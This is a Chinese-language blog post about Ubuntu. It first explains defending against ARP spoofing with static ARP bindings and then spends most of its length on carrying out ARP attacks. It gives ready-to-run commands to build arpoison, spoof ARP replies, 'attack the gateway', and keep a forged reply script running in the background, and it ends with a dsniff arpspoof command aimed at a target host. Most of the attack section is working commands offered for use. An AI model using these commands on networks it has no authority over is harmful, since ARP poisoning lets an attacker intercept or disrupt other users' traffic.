无名阁
ubuntu下防御arp攻击和进行ARP攻击
2012-4-8 笑看风云


本文介绍如何进行ARP攻击的防御和反击。






1,简单绑定办法



 


#查看网关地址
arp -nv
地址 类型 硬件地址 标志 Mask 接口
192.168.0.1 ether c8:3a:35:51:8a:88 C eth0
记录: 1 跳过: 0 找到: 1

#绑定方法一
arp -s 192.168.1.1 00:14:78:67:cf:00


 



#绑定方法二

sudo vi /etc/ethers

添加下面这行内容并保存



192.168.1.1 00:14:78:67:cf:00



然后编辑 /etc/init.d/rc.local ,在最后加上



arp -f



2,使用arpison

#arpison是个简单arp工具,可以自定义arp包的发送方式和内容



 


#安装libnet
sudo apt-get install libnet1-dev

#下载arpison
wget http://www.arpoison.net/arpoison-0.6.tar.gz

#解压并编译arpison
tar zxvf arpoison-0.6.tar.gz
cd arpoison
make
sudo cp arpoison /usr/local/bin


 



#简要命令帮助

Usage: -i -d -s -t -r

-i 网卡接口,比如eth0

-d 目的IP

-s 源IP

-t 目的IP对应的MAC地址

-r 源IP对应的MAC地址



-w 估计是发送间隔



-n 发送次数



#举例(反击就是把源IP改成被攻击者的ip,源ip对应的mac地址填写错误)

arpoison -i wlan0 -d 192.168.1.1 -s 192.168.1.251 -t 00:14:78:67:cf:00 -r 00:1f:3c:6d:a3:c7



攻击网关:



arpoison -i wlan0 -d 192.168.1.251 -d 192.168.1.1 -t ff:ff:ff:ff:ff:ff -r 00:1f:3c:6d:a3:c7



3,arpison使用脚本



 


#/bin/bash
#pw.sh
#网关mac地址
GATEWAY_MAC=00:14:78:67:cf:00

#目的mac地址
DEST_MAC=00:14:78:67:cf:00

#目的ip地址(网段广播地址)
DEST_IP=192.168.1.1

#本地网卡接口
INTERFACE=wlan0

#$INTERFACE的mac地址
MY_MAC=00:1f:3c:6d:a3:c7

#$INTERFACE的ip地址
MY_IP=192.168.1.251

#在本机建立静态ip/mac入口 $DEST_IP--$GATEWAY_MAC
arp -s $DEST_IP $GATEWAY_MAC

#发送arp reply ,使$DEST_IP更新$MY_IP的mac地址为$MY_MAC
arpoison -i $INTERFACE -d $DEST_IP -s $MY_IP -t $DEST_MAC -r $MY_MAC 1>/dev/null &


 



#执行脚本

sudo ./pw.sh



本文转自http://www.forzw.com/archives/458



2014年10月22号更新



最近发现了一个新的ARP攻击软件,不需要编译,Ubuntu软件源中有这个软件:那就是dsniff,



安装方法:

sudo apt-get install dsniff

然后这样进行ARP攻击:
arpspoof -i eth0 -t 192.168.217.129 -r 192.168.217.2

其中-t指的是要攻击的目标,-r是要把网关改成哪个ip

评论:
梦里的畅泳
2014-05-16 01:00 回复
支持博主!
发表评论:
昵称

邮件地址 (选填)

个人主页 (选填)

内容